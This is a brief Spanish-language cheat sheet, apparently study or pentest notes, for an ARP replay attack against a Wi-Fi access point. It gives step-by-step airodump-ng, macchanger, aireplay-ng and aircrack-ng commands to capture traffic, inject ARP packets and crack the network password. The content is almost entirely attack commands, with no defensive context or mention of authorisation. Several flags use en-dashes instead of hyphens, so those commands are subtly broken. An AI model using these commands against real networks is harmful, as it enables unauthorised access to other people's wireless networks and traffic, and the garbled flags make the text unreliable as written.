ARP Replay Attack
Ataque usado para la obtención de contraseña. Se inyectan paquetes ARP a la red para forzar al AP a retransmitirlos. Esto genera tráfico con los suficientes IVs como para descifrar la contraseña.
Capturar tráfico con Airodump-ng
sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
En paralelo, ejecutar MACchanger para conocer la dirección MAC de la interfaz de red utilizada
macchanger --show <wifi_interface>
Ejecutar ataque arpreplay con Aireplay-ng
sudo aireplay-ng --arpreplay –x 1000 –n 1000 –b <MAC_AP> -h <MAC_wifi_interface> <wifi_interface>
Crackear contraseña con Aircrack-ng desde fichero con tráfico capturado en Airodump-ng
sudo aircrack-ng –b <MAC_AP> traffic_file.cap